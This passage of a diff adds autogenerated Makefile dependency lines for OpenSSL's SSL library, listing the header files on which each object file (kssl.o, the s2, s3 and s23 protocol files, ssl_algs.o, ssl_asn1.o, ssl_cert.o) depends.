+kssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+kssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+kssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+kssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+kssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+kssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+kssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+kssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+kssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl.c
+kssl.o: kssl_lcl.h
+s23_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_clnt.o: ../include/openssl/x509_vfy.h s23_clnt.c ssl_locl.h
+s23_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_lib.c
+s23_lib.o: ssl_locl.h
+s23_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_meth.c
+s23_meth.o: ssl_locl.h
+s23_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_pkt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_pkt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_pkt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_pkt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_pkt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_pkt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_pkt.c
+s23_pkt.o: ssl_locl.h
+s23_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_srvr.o: ../include/openssl/x509_vfy.h s23_srvr.c ssl_locl.h
+s2_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_clnt.c
+s2_clnt.o: ssl_locl.h
+s2_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_enc.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_enc.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_enc.c
+s2_enc.o: ssl_locl.h
+s2_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_lib.c
+s2_lib.o: ssl_locl.h
+s2_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_meth.c
+s2_meth.o: ssl_locl.h
+s2_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_pkt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_pkt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_pkt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_pkt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_pkt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_pkt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_pkt.c
+s2_pkt.o: ssl_locl.h
+s2_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_srvr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_srvr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_srvr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_srvr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_srvr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_srvr.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_srvr.c
+s2_srvr.o: ssl_locl.h
+s3_both.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_both.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_both.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_both.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_both.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_both.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_both.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_both.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_both.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_both.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_both.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_both.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_both.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_both.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_both.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_both.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_both.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_both.o: ../include/openssl/x509_vfy.h s3_both.c ssl_locl.h
+s3_cbc.o: ../crypto/constant_time_locl.h ../e_os.h ../include/openssl/asn1.h
+s3_cbc.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+s3_cbc.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+s3_cbc.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_cbc.o: ../include/openssl/err.h ../include/openssl/evp.h
+s3_cbc.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_cbc.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_cbc.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_cbc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_cbc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_cbc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_cbc.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_cbc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_cbc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_cbc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_cbc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_cbc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_cbc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s3_cbc.c
+s3_cbc.o: ssl_locl.h
+s3_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_clnt.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s3_clnt.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+s3_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_clnt.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+s3_clnt.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+s3_clnt.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s3_clnt.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s3_clnt.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s3_clnt.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+s3_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl_lcl.h
+s3_clnt.o: s3_clnt.c ssl_locl.h
+s3_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_enc.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+s3_enc.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+s3_enc.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s3_enc.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s3_enc.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s3_enc.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_enc.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_enc.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_enc.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_enc.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_enc.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_enc.o: ../include/openssl/x509_vfy.h s3_enc.c ssl_locl.h
+s3_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_lib.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+s3_lib.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_lib.o: ../include/openssl/err.h ../include/openssl/evp.h
+s3_lib.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_lib.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl_lcl.h
+s3_lib.o: s3_lib.c ssl_locl.h
+s3_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s3_meth.c
+s3_meth.o: ssl_locl.h
+s3_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_pkt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_pkt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_pkt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_pkt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_pkt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_pkt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_pkt.o: ../include/openssl/x509_vfy.h s3_pkt.c ssl_locl.h
+s3_srvr.o: ../crypto/constant_time_locl.h ../e_os.h ../include/openssl/asn1.h
+s3_srvr.o: ../include/openssl/bio.h ../include/openssl/bn.h
+s3_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_srvr.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+s3_srvr.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_srvr.o: ../include/openssl/err.h ../include/openssl/evp.h
+s3_srvr.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_srvr.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_srvr.o: ../include/openssl/x509_vfy.h kssl_lcl.h s3_srvr.c ssl_locl.h
+ssl_algs.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_algs.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_algs.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_algs.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_algs.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_algs.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_algs.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_algs.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_algs.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_algs.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_algs.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_algs.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_algs.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_algs.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_algs.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_algs.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_algs.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_algs.c
+ssl_algs.o: ssl_locl.h
+ssl_asn1.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/asn1_mac.h
+ssl_asn1.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+ssl_asn1.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+ssl_asn1.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_asn1.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_asn1.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_asn1.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_asn1.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_asn1.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_asn1.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_asn1.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_asn1.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ssl_asn1.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ssl_asn1.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ssl_asn1.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ssl_asn1.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ssl_asn1.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+ssl_asn1.o: ../include/openssl/x509_vfy.h ssl_asn1.c ssl_locl.h
+ssl_cert.o: ../crypto/o_dir.h ../e_os.h ../include/openssl/asn1.h
+ssl_cert.o: ../include/openssl/bio.h ../include/openssl/bn.h
+ssl_cert.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_cert.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_cert.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_cert.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_cert.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_cert.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_cert.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
